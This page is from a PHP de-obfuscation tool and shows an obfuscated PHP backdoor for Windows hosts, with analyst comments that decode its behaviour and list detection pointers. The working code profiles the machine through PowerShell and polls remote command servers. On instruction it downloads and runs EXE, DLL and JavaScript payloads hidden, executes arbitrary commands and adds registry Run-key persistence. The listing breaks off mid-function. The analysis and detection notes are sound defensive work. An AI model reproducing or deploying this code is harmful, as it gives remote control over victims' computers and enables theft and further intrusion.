De-obfuscate PHP malware, viruses and tampered code found on WordPress sites back into readable source code.
*Please note that not all obfuscation codes can be decoded.<?php /*
 * Analyst notes (comments only; every code token below is unchanged).
 *
 * Overview: a PHP script aimed at Windows hosts that profiles the machine,
 * polls a remote server over plain HTTP and acts on the typed tasks it gets
 * back. Control flow is flattened into goto labels and all strings are
 * octal/hex escaped, so execution begins at label BeBDr (the first statement
 * is "goto BeBDr"), not at the first function in the text.
 *
 * Start-up (BeBDr -> jUDyu -> te03m):
 *   - $TRW9p is a double quote (chr(0x22)) and $z5_HL a line feed (chr(0xa));
 *     both are used when building command lines and splitting output.
 *   - When ($argc < 2 and argv[0] is not "Standard input code") or (the zip
 *     extension is not loaded and __FILE__ exists), nrRh4() relaunches
 *     PHP_BINARY with "-d extension=zip -d extension_dir=ext <this file> 1"
 *     in a hidden window and this instance returns.
 *
 * Configuration set at top level:
 *   $Zq3dJ = 20  reported as other.version_build     $l2CpU = 80  destination port
 *   $oQjHi = 10  seconds slept per loop pass          $IBb3A = 200 error-count threshold
 *   $Jw6Sz       task-type map EXE=0 DLL=1 JS=2 CMD=3 ACTIVE=4 AUTORUN=5 OFF=6
 *   $KCom5       three hostnames, decoded and defanged:
 *                never-powered-agency-hear[.]trycloudflare[.]com
 *                ears-circus-cam-lake[.]trycloudflare[.]com
 *                varying-rentals-calgary-predict[.]trycloudflare[.]com
 *   $IpuLn       two fallback addresses: 159.69.187[.]78, 184.95.51[.]165
 *
 * Main loop (label a1o7w): "if (!true)" never leaves the loop. Each pass
 * calls KVUj0($d_22F); any Throwable increments $JpsO7 and re-picks a host
 * from $KCom5 while $JpsO7 < $IBb3A, otherwise from $IpuLn; then sleep($oQjHi).
 *
 * Function map (names are case-insensitive in PHP, hence the mixed casing at call sites):
 *   N5n7d   true when $argv[0] === "Standard input code".
 *   ebUom   wraps a string in double quotes.
 *   dc6ta   random [0-9a-zA-Z] string of the requested length, built with rand().
 *   VQAIZ   returns a random entry name from the %APPDATA% / %LOCALAPPDATA% listings
 *           (also print_r()s the list).
 *   m3tzg   mkdir() of %APPDATA%\<VQAIZ name><random number>; returns that path.
 *   SqC8C   builds the request path: random segments plus 32 hex digits derived
 *           from a timestamp and random_int() mixed with fixed constants.
 *   lu3mN   host profile via "powershell -c": systeminfo, SYSTEM/ADMIN/USER check,
 *           tasklist /svc, Get-Service, Get-PSDrive, Get-NetNeighbor; throws
 *           "Failed to execute command" on a non-zero exit code.
 *   NkUk9   in-place rolling XOR of a buffer with a key (by reference).
 *   eqiUb   XORs the payload with a random 4-byte key (pack "V"), appends the key,
 *           then gzencode()s the result.
 *   QUZhV   POST to http://<host>:<port><SqC8C path>, Content-type
 *           application/octet-stream, timeout 20; returns content/headers/status/code.
 *   W2HkM   downloads a URL to a tmpfile and extracts it into a directory through an
 *           object with open/extractTo/close; the class appears as Y27bM here,
 *           presumably ZipArchive given the zip-extension check (verify).
 *   Zj6UF   persistence: "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
 *           with a value named after a random AppData entry and data
 *           "<PHP_BINARY>" "<script path>". When running as stdin code it first
 *           recovers its own source from the wmic command line and writes it to a
 *           .txt file next to PHP_BINARY.
 *   kWB_d   proc_open() of a received command; handles kept in global $tPTLN.
 *   SQ9Nz   once that process has exited, returns "out:...". plus "err(<code>):..."
 *           when stderr is non-empty; null while running or when nothing is pending.
 *   nrRh4   runs "powershell.exe -WindowStyle Hidden -c Start-Process ..." for a
 *           file path and optional argument list.
 *   KVUj0   one poll: attaches pending command output as "cmd", POSTs the encoded
 *           profile, returns on HTTP 204, throws on any other non-200 code. On 200 the
 *           last 4 bytes are the XOR key and the last decoded byte is the task type:
 *           CMD -> kWB_d; ACTIVE -> sets $u9iZC; AUTORUN -> Zj6UF; OFF -> exit;
 *           EXE -> written as .exe and started; DLL -> written as .png and passed to
 *           rundll32.exe with "start"; JS -> written as .jpg and passed to node.exe
 *           (fetched from nodejs.org v21.7.3 into %APPDATA% when absent);
 *           anything else -> written as .txt.
 *
 * Detection and triage pointers drawn from the behaviour above:
 *   - HKCU ...\CurrentVersion\Run values whose data starts with a quoted php.exe path.
 *   - php.exe as parent of powershell.exe (-WindowStyle Hidden), wmic.exe or reg.exe.
 *   - rundll32.exe loading a .png, or node.exe under
 *     %APPDATA%\node-v21.7.3-win-x64 given a .jpg argument.
 *   - %APPDATA% directories named <existing folder name><digits> holding 8-character
 *     random file names ending .exe, .png, .jpg or .txt.
 *   - Outbound HTTP POSTs on port 80 with application/octet-stream bodies to the
 *     hosts listed above.
 *
 * NOTE(review): the machine-generated de-obfuscation shown after this script folds
 * some constants differently from this original (for example __FILE__ appears as a
 * literal path and PHP_EOL as literal text); treat this listing as authoritative.
 */ goto BeBDr; wQght: $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)]; goto Zik3U; vvnY6: function VQAIZ() { goto fGkFP; wTEci: $XEMm8 = array_diff($XEMm8, ["\56", "\56\56"]); goto x9TW7; x9TW7: $XEMm8 = array_values($XEMm8); goto rrv0t; KQJsL: return $XEMm8[rand(0, count($XEMm8) - 1)]; goto LYYke; rrv0t: print_r($XEMm8); goto KQJsL; fGkFP: $XEMm8 = scandir(getenv("\101\120\x50\104\101\x54\x41")) + scandir(getenv("\114\117\103\101\114\101\x50\x50\104\101\124\101")); goto wTEci; LYYke: } goto J45Qw; J45Qw: function dc6ta($M3_yG = 16) { goto ywNJi; jgJmB: $CTLfW = ''; goto v0sQ_; KmSVu: if (!($izpa6 < $M3_yG)) { goto mrCJq; } goto xJWe_; qTUdN: $rPvk7 = strlen($Gmm_S); goto jgJmB; izad0: bTm_B: goto QeeKQ; QeeKQ: $izpa6++; goto fDxVz; GLNBa: mrCJq: goto SV3Kc; v0sQ_: $izpa6 = 0; goto jLdWC; jLdWC: jBUAd: goto KmSVu; SV3Kc: return $CTLfW; goto rCuGQ; ywNJi: $Gmm_S = "\x30\x31\x32\63\x34\x35\x36\67\x38\71\x61\x62\143\x64\145\146\147\150\151\152\x6b\154\155\x6e\x6f\x70\x71\x72\163\164\x75\x76\167\x78\x79\x7a\x41\x42\103\x44\105\106\x47\110\111\112\x4b\114\x4d\x4e\117\120\x51\x52\x53\124\125\x56\x57\x58\x59\132"; goto qTUdN; xJWe_: $CTLfW .= $Gmm_S[rand(0, $rPvk7 - 1)]; goto izad0; fDxVz: goto jBUAd; goto GLNBa; rCuGQ: } goto fcShX; K_57A: $l2CpU = 80; goto UC4wF; A8TQi: if (!true) { goto gynqD; } goto KmTfJ; fcShX: $tPTLN = null; goto zVxnq; zVxnq: function kWB_d($F3c9H) { goto EaXSO; EaXSO: global $tPTLN; goto uO7HP; UIjXp: j1pCb: goto sKaXg; uO7HP: $P80xZ = array(0 => array("\160\x69\x70\x65", "\162"), 1 => array("\x70\x69\160\145", "\167"), 2 => array("\160\x69\x70\x65", "\167")); goto urOwq; sKaXg: $tPTLN = ["\x70\x72\x6f\x63\145\x73\163" => $m4lMb, "\x70\x69\x70\145\x73" => $Fa3EX]; goto d9zZ5; k0jhe: if (is_resource($m4lMb)) { goto j1pCb; } goto EsrXH; urOwq: $m4lMb = proc_open($F3c9H, $P80xZ, $Fa3EX); goto k0jhe; EsrXH: return "\74\x66\141\x69\x6c\145\144\x3e"; goto UIjXp; d9zZ5: } goto toKXa; toKXa: 
/* SQ9Nz(): reads stdout/stderr of the process stored in global $tPTLN once proc_get_status() reports it is no longer running, then clears $tPTLN. */
function SQ9Nz() { goto mWS4X; omgp5: TWPqZ: goto I393y; vdcP9: fclose($Fa3EX[1]); goto xKb8s; xKb8s: fclose($Fa3EX[2]); goto vF5MC; ThrJa: if (!proc_get_status($m4lMb)["\x72\x75\x6e\156\x69\x6e\147"]) { goto exJVc; } goto IHXty; YTHzP: goto TWPqZ; goto HXtUG; vF5MC: $jzdVa = proc_close($m4lMb); goto nHn0y; IHXty: echo "\44\x6c\141\163\x74\x5f\143\x6f\x6d\155\141\156\x64\x20\x3d\75\40\162\165\x6e\156\151\156\x67" . PHP_EOL; goto G0xrg; rZNnD: V7_hD: goto UzF1X; Ssj6C: $Fa3EX = $tPTLN["\160\x69\160\145\x73"]; goto ThrJa; LsIdF: if (!(!$tPTLN || !isset($tPTLN["\160\x72\157\x63\x65\x73\163"]) || !isset($tPTLN["\160\x69\160\145\x73"]))) { goto V7_hD; } goto RzK6r; SDU8_: $f9Lnh .= PHP_EOL . "\x65\x72\162\50" . $jzdVa . "\x29\x3a" . PHP_EOL . $AirsC; goto bJxsE; UNePZ: $AirsC = stream_get_contents($Fa3EX[2]); goto ae9m0; XlRmz: exJVc: goto sSqE7; Qe_fq: $OeoM5 = stream_get_contents($Fa3EX[1]); goto UNePZ; nHn0y: $f9Lnh = "\x6f\165\164\x3a" . PHP_EOL; goto y1EmH; G0xrg: return null; goto XlRmz; ae9m0: fclose($Fa3EX[0]); goto vdcP9; zOBe9: return $f9Lnh; goto owZX0; HXtUG: i0Ehx: goto nvLE7; BTb3s: return null; goto rZNnD; RzK6r: echo "\44\154\x61\x73\x74\137\x63\157\x6d\x6d\x61\x6e\x64\x20\75\75\x20\156\x75\154\154" . PHP_EOL; goto BTb3s; bJxsE: bA9U2: goto zOBe9; y1EmH: if ($OeoM5) { goto i0Ehx; } goto x2ERB; mWS4X: global $tPTLN; goto LsIdF; sSqE7: $tPTLN = null; goto Qe_fq; nvLE7: $f9Lnh .= $OeoM5; goto omgp5; I393y: if (!$AirsC) { goto bA9U2; } goto SDU8_; x2ERB: $f9Lnh .= "\x3c\145\155\160\x74\171\76"; goto YTHzP; UzF1X: $m4lMb = $tPTLN["\x70\x72\x6f\143\145\163\x73"]; goto Ssj6C; owZX0: } goto GHIf_; UC4wF: $Jw6Sz = ["\x45\x58\105" => 0, "\x44\114\114" => 1, "\112\x53" => 2, "\103\x4d\104" => 3, "\x41\103\124\111\126\x45" => 4, "\101\125\x54\x4f\x52\x55\116" => 5, "\x4f\106\x46" => 6]; goto ByRHm; Mm33p: function m3tzg() { goto bDJYV; bDJYV: $A94N8 = getenv("\101\120\x50\104\101\x54\101") . "\x5c" . vqAIz() . 
rand(0, 1000000); goto CE9ZT; CE9ZT: mkdir($A94N8); goto b8iK4; b8iK4: return $A94N8; goto p1B8l; p1B8l: } goto imMGg; Vgj45: if (count($KCom5) > 0) { goto Wic5f; } goto jePle; MLyYf: $KCom5 = ["\156\145\166\145\x72\x2d\160\157\x77\145\162\145\144\55\141\147\145\x6e\x63\x79\55\x68\145\x61\162\56\x74\162\x79\143\154\157\165\144\146\154\141\x72\145\56\143\157\x6d", "\x65\x61\162\x73\x2d\143\x69\x72\x63\x75\x73\55\143\x61\x6d\55\154\x61\153\145\56\164\162\x79\x63\x6c\157\x75\x64\x66\x6c\141\x72\x65\x2e\143\157\x6d", "\166\141\162\x79\x69\x6e\147\55\162\x65\156\x74\141\154\x73\55\143\141\154\147\x61\x72\171\55\x70\x72\145\144\151\143\164\56\x74\162\x79\143\x6c\x6f\165\x64\x66\154\141\x72\145\56\x63\157\155"]; goto Vgj45; YyXxs: $oQjHi = 10; goto S8XAE; jePle: $d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)]; goto d13SC; YChMi: Wic5f: goto wQght; JnKhD: function QUZhV($d_22F, $bzn_F) { goto Td74Y; CH5yz: $BW3Wg = null; goto RaWdI; DNF_V: $RKhlJ = ["\x68\164\164\x70" => ["\155\x65\x74\x68\x6f\144" => "\x50\x4f\123\x54", "\150\x65\x61\144\x65\162" => ["\x43\157\156\164\145\156\x74\55\164\x79\x70\145\x3a\x20\x61\160\160\x6c\x69\143\141\164\x69\x6f\156\x2f\157\143\164\145\x74\55\x73\x74\162\x65\141\x6d"], "\143\x6f\156\x74\x65\x6e\x74" => $bzn_F, "\x69\147\156\x6f\162\145\137\x65\x72\162\157\162\x73" => true, "\164\151\x6d\145\x6f\x75\x74" => 20]]; goto tteol; tteol: $rWwMf = "\150\x74\x74\160\x3a\x2f\x2f" . $d_22F . "\x3a" . $l2CpU . sqC8C(); goto nlOsF; HGkFn: $Aarsj = (int) $Lxf9l[1]; goto rhBTq; V9tQI: throw new Exception("\x48\124\x54\120\x20\x72\x65\161\165\145\x73\x74\40\x66\x61\151\x6c\145\x64\x3a\40" . 
($BW3Wg ?: "\125\156\153\x6e\157\167\156\40\145\162\162\157\162")); goto f2R2O; anpHl: if (!isset($Lxf9l[1])) { goto qR0In; } goto HGkFn; W2Sg8: $by1ps = file_get_contents($rWwMf, false, $uz8es); goto mk7vj; wBhHF: $Aarsj = 0; goto ONDYR; KogqM: return ["\143\x6f\156\164\145\x6e\164" => $by1ps, "\150\x65\x61\x64\145\162\x73" => $http_response_header, "\x73\164\x61\x74\x75\x73" => $http_response_header[0] ?? null, "\x63\157\144\x65" => $Aarsj]; goto OpMtc; RaWdI: set_error_handler(function ($qVljG, $OndyP) use(&$BW3Wg) { $BW3Wg = $OndyP; }); goto W2Sg8; HyvsP: if (!($by1ps === false)) { goto mbOHh; } goto V9tQI; mk7vj: restore_error_handler(); goto HyvsP; rhBTq: qR0In: goto gYmPJ; ONDYR: if (!isset($http_response_header[0])) { goto n3bJj; } goto HQGeS; gYmPJ: n3bJj: goto KogqM; f2R2O: mbOHh: goto wBhHF; nlOsF: $uz8es = stream_context_create($RKhlJ); goto CH5yz; HQGeS: preg_match("\57\110\x54\x54\x50\x5c\57\134\x64\x5c\56\134\144\x5c\163\x2b\x28\134\144\173\x33\175\x29\57", $http_response_header[0], $Lxf9l); goto anpHl; Td74Y: global $l2CpU; goto DNF_V; OpMtc: } goto jwiJl; leVfr: function Zj6UF() { goto KFeNn; v0V7c: file_put_contents($OPdCw, $hiPBF); goto qWHem; E0ECd: $hiPBF = isset($UAqhd[1]) ? trim(str_replace($TRW9p, '', $UAqhd[1])) : ''; goto v0V7c; ENahA: $UAqhd = preg_split("\x2f\160\x68\160\x5c\x2e\x65\170\x65\56\x2a\x3f\134\163\55\162\134\x73\53\57", $gGkCt, 2); goto E0ECd; TEO6A: return true; goto Z9Yhp; OdXxl: goto Vr2kq; goto EDqGK; JxlQ3: $gGkCt = trim($XYh87[1] ?? ''); goto ENahA; gBZ6r: if (!(!$xJ5KY || !preg_match_all("\x2f\x5c\x73\x2d\x72\134\163\x2f", $xJ5KY))) { goto oJ3Yk; } goto E1oNF; uqeHW: if (N5n7D()) { goto neKSL; } goto C_Fet; Jkv_g: exec("\162\x65\x67\x20\x61\x64\144\x20\110\x4b\x43\x55\134\x53\157\146\x74\167\141\x72\x65\134\x4d\151\143\x72\157\x73\157\146\164\134\127\x69\x6e\x64\x6f\x77\163\134\103\x75\x72\162\x65\156\x74\126\x65\162\x73\151\157\156\x5c\x52\x75\x6e\x20\x2f\166\40" . EbuoM(vqaIz()) . 
"\x20\x2f\164\40\122\105\107\137\123\x5a\x20\x2f\x64\x20" . EbuOm("\134" . $TRW9p . PHP_BINARY . "\134" . $TRW9p . "\40\134" . $TRW9p . $OPdCw . "\x5c" . $TRW9p) . "\40\x2f\x66"); goto TEO6A; EDqGK: neKSL: goto YYfKG; C_Fet: $OPdCw = __FILE__; goto OdXxl; j5WG1: oJ3Yk: goto kDbeh; KXqu6: $xJ5KY = shell_exec("\x77\x6d\151\x63\40\x70\162\157\143\x65\x73\x73\40\167\150\x65\x72\x65\x20\160\162\x6f\143\x65\x73\163\x69\x64\75" . getmypid() . "\40\147\145\x74\40\x63\x6f\155\155\141\x6e\144\154\151\156\x65"); goto gBZ6r; kDbeh: $XYh87 = explode($z5_HL, $xJ5KY, 2); goto JxlQ3; YYfKG: $OPdCw = dirname(PHP_BINARY) . dc6Ta(12) . "\56\164\x78\164"; goto KXqu6; E1oNF: return false; goto j5WG1; KFeNn: global $TRW9p, $z5_HL; goto uqeHW; qWHem: Vr2kq: goto Jkv_g; Z9Yhp: } goto vvnY6; BeBDr: $TRW9p = chr(0x22); goto jUDyu; qDomh: sleep($oQjHi); goto jkOM3; JO88S: function SqC8C() { goto Ohh8c; YPPps: $qFHIp ^= $gmNZ1; goto O9gDf; CNaG8: $Py5k4 = (int) $ttefF->getTimestamp() & (int) 1.8446744073709548E+19; goto z5RZW; rqcs4: $gmNZ1 = $gmNZ1 + 0xf2879630 + ($WiBhc < 0x29807914 ? 1 : 0) & 0xffffffff; goto YPPps; z5RZW: $JZJtV = random_int(PHP_INT_MIN, PHP_INT_MAX); goto fAu_h; zVXl0: $NcwlV = DC6tA(rand(0, 14)); goto kQ1xf; sTzvK: $FnMw5 = $FnMw5 + 0x7ab092fe & 0xffffffff; goto nu0oi; fAu_h: $qFHIp = $Py5k4 >> 32 & 0xffffffff; goto Qh07p; O_tQk: return ($NcwlV !== '' ? "\x2f" . $NcwlV : '') . "\57" . dC6ta(rand(0, 14)) . "\x26" . $Pab0F . $ZgXXo . ($SWHqo !== '' ? "\57" . 
$SWHqo : ''); goto cj_z3; s_GP7: $FnMw5 ^= 0xd1769498; goto z6aiy; z6aiy: $qFHIp ^= 0x86ad5709; goto WaN6S; kQ1xf: $SWHqo = dC6ta(rand(0, 14)); goto O_tQk; WaN6S: $FnMw5 ^= 0x15de8713; goto alX36; O9gDf: $FnMw5 ^= $WiBhc; goto u2VUf; alX36: $WiBhc = $WiBhc + 0x29807914 & 0xffffffff; goto rqcs4; u2VUf: $Pab0F = sprintf("\x25\60\x38\x78\45\x30\x38\170", $qFHIp, $FnMw5); goto GeT9N; alrbV: $gmNZ1 = $JZJtV >> 32 & 0xffffffff; goto Bx7Ej; gFxSB: $qFHIp ^= $gmNZ1; goto XWAyf; Bx7Ej: $WiBhc = $JZJtV & 0xffffffff; goto gFxSB; Ohh8c: $ttefF = new DateTime("\x6e\x6f\167", new DateTimeZone("\105\x74\x63\x2f\107\115\x54\53\65")); goto CNaG8; nu0oi: $qFHIp = $qFHIp + 0x80952678 + ($FnMw5 < 0x7ab092fe ? 1 : 0) & 0xffffffff; goto r1ZTh; Qh07p: $FnMw5 = $Py5k4 & 0xffffffff; goto alrbV; GeT9N: $ZgXXo = sprintf("\x25\x30\x38\170\x25\x30\x38\170", $gmNZ1, $WiBhc); goto zVXl0; XWAyf: $FnMw5 ^= $WiBhc; goto sTzvK; r1ZTh: $qFHIp ^= 0x219f7609; goto s_GP7; cj_z3: } goto mOGQB; te03m: if (!($argc < 2 && !N5n7d() || !extension_loaded("\x7a\151\160") && file_exists(__FILE__))) { goto d2Cq7; } goto aBwrc; d13SC: goto birOS; goto YChMi; YIlPJ: function ebUom($CTLfW) { global $TRW9p; return $TRW9p . $CTLfW . $TRW9p; } goto JO88S; imMGg: function KVUj0($d_22F) { goto KmGMJ; VxX48: echo "\62\60\x34" . PHP_EOL; goto Kpc0G; TK9nC: $Aarsj = $hiPBF["\143\157\x64\145"]; goto FfHB9; Kpc0G: return; goto iGQ9x; iGQ9x: qQgvj: goto itQbh; rauHK: $FbIQb = $hiPBF["\x63\157\x6e\x74\x65\156\164"]; goto TK9nC; pNSWp: $v9iU7 = substr($FbIQb, strlen($FbIQb) - 4, strlen($FbIQb)); goto oxuNd; hjEpS: throw new Exception("\x48\124\124\120\40\x72\145\161\165\x65\x73\164\40\146\x61\151\154\x65\144\x3a\x20" . 
$Aarsj); goto wECSe; aFrIS: asPv7: goto w9ku1; Xx1R4: uxcjk: goto aFrIS; itQbh: if (!($Aarsj !== 200)) { goto vV1w3; } goto hjEpS; b80rN: $F3c9H = null; goto XKgkL; KmGMJ: global $bIiky, $Jw6Sz, $TRW9p, $u9iZC; goto JeQZy; cFbCQ: unset($bIiky["\x63\x6d\x64"]); goto rauHK; N7Wsa: NKuK9($FbIQb, $v9iU7); goto SIa2F; XKgkL: switch ($R1Ohn) { case $Jw6Sz["\x43\115\104"]: goto K2mc1; v2LDY: return; goto n8IFP; K2mc1: echo "\x43\x4d\x44" . PHP_EOL; goto vP_ay; vP_ay: Kwb_D($FbIQb); goto v2LDY; n8IFP: case $Jw6Sz["\101\x43\x54\111\126\x45"]: goto oIql2; oIql2: echo "\101\103\124\x49\126\105" . PHP_EOL; goto zuU3c; K5bMt: return; goto asxYD; zuU3c: $u9iZC = unpack("\x56", $FbIQb)[1]; goto K5bMt; asxYD: case $Jw6Sz["\x41\125\x54\x4f\122\x55\x4e"]: goto qCbY5; qCbY5: echo "\x41\x55\x54\x4f\122\x55\116" . PHP_EOL; goto ZZB7b; ZZB7b: Zj6uF(); goto q1i8r; q1i8r: return; goto FdFOS; FdFOS: case $Jw6Sz["\x4f\106\x46"]: echo "\117\x46\x46" . PHP_EOL; exit(0); case $Jw6Sz["\105\x58\x45"]: goto SKbke; SKbke: echo "\105\130\x45" . PHP_EOL; goto zIllA; ct2Sa: goto asPv7; goto EkiqN; oCsyZ: file_put_contents($yQKMW, $FbIQb); goto ct2Sa; zIllA: $yQKMW = M3tZG() . "\x5c" . dc6Ta(8) . "\56\x65\170\145"; goto oCsyZ; EkiqN: case $Jw6Sz["\104\x4c\x4c"]: goto ol3LV; Kt_0R: $F3c9H = ebuom($q6oxc) . "\x20\163\164\x61\x72\164"; goto XQkFa; g44d0: $yQKMW = "\x43\x3a\x5c\127\151\x6e\x64\157\167\x73\x5c\123\x79\x73\164\x65\155\x33\x32\x5c\x72\165\x6e\144\x6c\x6c\63\x32\x2e\x65\x78\145"; goto Kt_0R; w5NkC: $q6oxc = M3TZG() . "\134" . DC6TA(8) . "\x2e\160\x6e\147"; goto g44d0; ol3LV: echo "\104\114\x4c" . PHP_EOL; goto w5NkC; JHbtj: goto asPv7; goto bidxU; XQkFa: file_put_contents($q6oxc, $FbIQb); goto JHbtj; bidxU: case $Jw6Sz["\x4a\x53"]: goto rtpJR; ORX62: echo "\x66\141\x69\x6c\x65\144\x20\151\156\x73\164\141\x6c\154\x20\156\157\144\x65\152\163" . PHP_EOL; goto yYA_E; ZSeux: goto asPv7; goto l0nBk; xvWIX: $yQKMW = getenv("\x41\120\120\x44\x41\124\x41") . "\x5c" . 
"\x6e\157\144\x65\x2d\x76\62\61\x2e\67\x2e\x33\55\167\x69\156\55\x78\x36\x34\134\x6e\157\144\x65\56\x65\x78\145"; goto MnxNb; rtpJR: echo "\x4a\x53" . PHP_EOL; goto xvWIX; JqYdW: wel4m: goto bees3; bees3: $F3c9H = M3tzG() . "\x5c" . dC6Ta(8) . "\56\x6a\160\147"; goto TidZZ; TidZZ: file_put_contents($F3c9H, $FbIQb); goto ZSeux; MnxNb: if (!(!file_exists($yQKMW) && !W2hkm("\x68\x74\164\x70\72\x2f\57\156\x6f\144\145\x6a\x73\56\x6f\162\x67\57\x64\151\163\164\57\166\x32\x31\56\x37\x2e\63\x2f\156\x6f\x64\x65\x2d\x76\x32\61\56\x37\x2e\63\55\x77\151\156\x2d\x78\x36\64\56\172\x69\160", getenv("\x41\x50\x50\x44\x41\x54\101")))) { goto wel4m; } goto ORX62; yYA_E: return; goto JqYdW; l0nBk: default: goto D2MfT; D2MfT: echo "\117\x54\110\105\122" . PHP_EOL; goto twkfY; V1A82: return; goto So8yx; twkfY: file_put_contents(m3Tzg() . "\x5c" . dc6ta(8) . "\56\164\170\164", $FbIQb); goto V1A82; So8yx: } goto Xx1R4; fXNXn: $hiPBF = QuZhv($d_22F, EQIuB(json_encode($bIiky, JSON_PRETTY_PRINT))); goto cFbCQ; SIa2F: $R1Ohn = ord($FbIQb[strlen($FbIQb) - 1]); goto PUm8g; u1CtG: $bIiky["\x63\x6d\x64"] = $Wp4BQ; goto Rumpk; wECSe: vV1w3: goto pNSWp; JeQZy: if (!(($Wp4BQ = sQ9NZ()) !== null)) { goto Wa39F; } goto u1CtG; Rumpk: Wa39F: goto fXNXn; FfHB9: if (!($Aarsj == 204)) { goto qQgvj; } goto VxX48; oxuNd: $FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 4); goto N7Wsa; PUm8g: $FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 1); goto b80rN; w9ku1: nrrh4($yQKMW, $F3c9H); goto CJVIp; CJVIp: } goto YyXxs; ByRHm: $u9iZC = 0; goto fCIkH; ixhTo: function eqiUb($bzn_F) { goto SgODF; vfFi0: $mesY9 = pack("\126", $DBzW7); goto hLyex; SgODF: $DBzW7 = mt_rand(0, 100000000); goto vfFi0; Z20Gj: return gzencode($wp5cV, 5, FORCE_GZIP); goto Jqpl2; tX1xF: $wp5cV = $bzn_F . $mesY9; goto Z20Gj; hLyex: nKUk9($bzn_F, $mesY9); goto tX1xF; Jqpl2: } goto JnKhD; DJwWm: $IBb3A = 200; goto ZChWJ; tLrpS: echo "\141\x63\164\151\166\145\137\143\x6e\x74\72\x20" . $u9iZC . 
PHP_EOL; goto qDomh; KmTfJ: try { goto Jujja; f3aYr: goto iaVsD; goto RhSiE; BuzqK: ZWb_Y: goto ZZi02; KBm1S: $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)]; goto IW10s; mojo0: GvZkQ: goto nfu5b; CNHRa: $JpsO7++; goto OL_dU; a3HaG: $oQjHi = 10; goto vs1di; nfu5b: $JpsO7 = $IBb3A - 10; goto EZxsz; RhSiE: NgD9M: goto a3HaG; FTcDh: MCKYl: goto u4YcL; OL_dU: goto MCKYl; goto BuzqK; EZxsz: if (!(count($KCom5) > 0)) { goto VLxTz; } goto KBm1S; JqlRr: Ld0Oy: goto MsliG; L0FZy: if ($u9iZC > 0) { goto NgD9M; } goto mjG2o; GSY4j: if ($JpsO7 < $IBb3A) { goto ZWb_Y; } goto CNHRa; vs1di: $u9iZC--; goto cNCkn; dlf9Z: if ($JpsO7 >= $IBb3A + 10) { goto GvZkQ; } goto GSY4j; u4YcL: goto Ld0Oy; goto mojo0; KKgTI: kvuJ0($d_22F); goto L0FZy; mjG2o: $oQjHi = 10; goto f3aYr; cNCkn: iaVsD: goto dlf9Z; ZZi02: $JpsO7 = 0; goto FTcDh; Jujja: echo $d_22F . PHP_EOL; goto rcimJ; IW10s: VLxTz: goto JqlRr; rcimJ: echo $JpsO7 . PHP_EOL; goto KKgTI; MsliG: } catch (Throwable $kA4rd) { goto qcD2t; r8IoB: goto Pmfje; goto EoKNg; EoKNg: Z_XFJ: goto wgJi6; wgJi6: $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)]; goto ZCOA5; Sgd4t: $oQjHi = 10; goto Thk6e; Thk6e: $u9iZC = 0; goto Gmlv7; d9vG8: $d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)]; goto r8IoB; ZCOA5: Pmfje: goto Sgd4t; Z8DUz: if ($JpsO7 < $IBb3A && count($KCom5) > 0) { goto Z_XFJ; } goto d9vG8; TGR01: $JpsO7++; goto Z8DUz; qcD2t: echo $z5_HL . "\105\x72\x72\x6f\162\x3a\x20" . $kA4rd->getMessage() . 
$z5_HL; goto TGR01; Gmlv7: } goto tyNEP; qdHaY: function N5n7d() { global $argv; return $argv[0] === "\123\x74\141\x6e\x64\141\162\x64\x20\x69\156\x70\165\x74\x20\x63\x6f\144\145"; } goto YIlPJ; j6E10: a1o7w: goto A8TQi; lAcZF: d2Cq7: goto F2A3z; S8XAE: $IpuLn = ["\61\65\71\56\66\71\x2e\61\70\x37\56\x37\x38", "\61\x38\64\56\71\65\x2e\x35\x31\x2e\x31\x36\x35"]; goto MLyYf; jkOM3: goto a1o7w; goto AS66c; GHIf_: function nrRh4($yQKMW, $F3c9H) { goto a1JKo; BtYaF: shell_exec($EcbYV); goto zrptX; a1JKo: global $TRW9p, $z5_HL; goto K1aux; K1aux: $EcbYV = "\160\x6f\167\145\x72\163\150\145\154\x6c\56\145\x78\x65\40\55\x57\x69\x6e\144\157\167\123\164\171\x6c\145\x20\x48\151\144\144\145\156\x20\x2d\143\40" . eBuOm("\123\x74\x61\162\164\x2d\120\x72\157\x63\145\x73\x73\x20\x2d\x57\151\156\x64\157\167\123\164\171\x6c\x65\40\110\x69\144\x64\145\x6e\40\55\106\151\154\145\120\x61\x74\x68\x20\x27" . $yQKMW . "\x27" . ($F3c9H ? "\x20\55\x41\x72\x67\x75\155\145\156\164\114\x69\x73\164\40\47" . preg_replace("\57" . $TRW9p . "\57", "\134" . $TRW9p, $F3c9H) . "\x27" : '')); goto YZiWR; YZiWR: echo $EcbYV . $z5_HL . $z5_HL; goto BtYaF; zrptX: } goto Mm33p; aBwrc: NRrh4(PHP_BINARY, "\x2d\144\x20\145\170\164\x65\x6e\x73\151\x6f\156\75\172\151\160\x20\55\x64\40\145\170\x74\145\x6e\x73\x69\157\x6e\x5f\x64\x69\x72\x3d\145\170\164\40" . eBUom(__FILE__) . 
"\x20\61"); goto yy3it; WepUh: function NkUk9(&$bzn_F, $OcIQg) { goto N14F2; fjxjK: $bzn_F[$izpa6] = chr(ord($bzn_F[$izpa6]) ^ (ord($OcIQg[$izpa6 % $eUFvf]) ^ $uxlfE) % 256); goto rkYjr; ujRY5: if (!($izpa6 < $MpqIM)) { goto rnSjV; } goto RN2Vn; mqR_h: rnSjV: goto N6o1D; N14F2: $uxlfE = ord($OcIQg[0]); goto oBRPg; NsJcW: $eUFvf = strlen($OcIQg); goto JAwLp; RN2Vn: $uxlfE = ($uxlfE + ($uxlfE + $izpa6 % 256)) % 256; goto fjxjK; FVBGl: goto UgVfQ; goto mqR_h; JAwLp: $izpa6 = 0; goto BjL0_; rkYjr: qVlcY: goto YmMJo; oBRPg: $MpqIM = strlen($bzn_F); goto NsJcW; YmMJo: ++$izpa6; goto FVBGl; BjL0_: UgVfQ: goto ujRY5; N6o1D: } goto ixhTo; F2A3z: $Zq3dJ = 20; goto K_57A; tyNEP: echo "\x64\145\154\141\171\x3a\40" . $oQjHi . PHP_EOL; goto tLrpS; Zik3U: birOS: goto DJwWm; mOGQB: function lu3mN() { goto tkyF4; rndx0: if (!($SNVCT !== 0)) { goto 